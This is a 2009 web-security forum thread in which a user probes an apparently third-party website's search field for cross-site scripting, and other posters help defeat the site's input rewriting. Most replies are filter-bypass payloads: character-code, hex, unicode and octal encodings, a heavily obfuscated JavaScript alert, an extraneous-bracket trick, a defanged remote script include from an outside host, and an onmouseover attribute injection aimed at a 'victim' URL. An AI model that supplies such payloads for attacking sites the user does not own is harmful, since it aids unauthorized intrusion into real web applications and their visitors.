Hello guys,

There is a website with a search field at the index page.

When i enter <script>alert("test");</script> in the search field there comes a pop-up which says: "best" instead of "test".


When I enter <script>alert("test123");</script> the website says: "test" instead of "test123"

What does this mean? isn't this website vulnerable to XSS or something?



Edited 2 time(s). Last edit at 10/05/2009 01:07PM by Hanna313.

I found out what happens:

when I enter: <script>alert("test");</script> in the searchfield a pop-up shows up saying "best".

What happens is that for some reason the pop-up contains the alternative searchword.

Another example: when I search for: <script>alert("doggy");</script> the pop-up shows up saying "dog", because it took the alternative searchword.

What can I do to prevent this and make the pop-up say what I enter as input?

maybe try String.fromCharCode

http://www.xssed.com/archive/author=PaPPy/

I just couldn't resist.....

<script>alert(String.fromCharCode(116,101,115,116));</script>
<script>alert("\x74\x65\x73\x74");</script>
<script>alert("\u0074\u0065\u0073\u0074");</script>
<script>alert("\164\145\163\164");</script>
<script>alert("&#65364;&#65349;&#65363;&#65364;");</script><!-- slackers needs UTF-8 this won't display correctly :P -->
<script>alert("test");</script>
<script>_=-~-~[],$=-~_,____=_<<_,__=____+~[];________=($-$)[________________=(''+{})[_+$]+(''+{})[$-_]+([].$+'')[$-_]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-_]+(!''+'')[_]+(''+{})[_+$]+({}+'')[$+$]+(''+{})[$-_]+(!''+'')[$-_]][________________];alert(________(________((!''+'')[$-_]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[_]+((!''+''))[$-_]+([].$+'')[$-_]+'\''+''+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+($+$)+(_+$)+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+$)+($+$)+'\\'+(_+_)+($-$)+'\\'+(_+_)+(_)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+($)+'\\'+($-_)+($+$)+(_+_)+'\\'+(_+_)+(_)+'\'')())())</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/06/2009 10:05AM by Gareth Heyes.

None of the input is working.

I tried Extraneous open brackets: <<SCRIPT>alert('test');//<</SCRIPT>

and this one first shows one pop-up saying: "best" and the next one saying "test".

So i am improving but how can I optimize this query, so I only get one -pop-up saying: "test"

have u tried including a remote script?

http://www.xssed.com/archive/author=PaPPy/

No I dont think so, how can I do that, and how does that work?

<script src=hxxp://ha.ckers.org/xss.js></script>
replace XX with tt

http://www.xssed.com/archive/author=PaPPy/

change hxxp to http
hxxps://victim/?UserN=" onmouseover="alert(1)" style="display:block; width:500px; height:500px;


works in firefox

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 11/10/2009 09:46PM by sirdarckcat.

Wrong place for replay pappy

http://sla.ckers.org/forum/read.php?2,31936


please remove MySite link
thank you



Edited 1 time(s). Last edit at 11/10/2009 09:31PM by mjmjmj.

k that was strange i know i replied to the PM...

http://www.xssed.com/archive/author=PaPPy/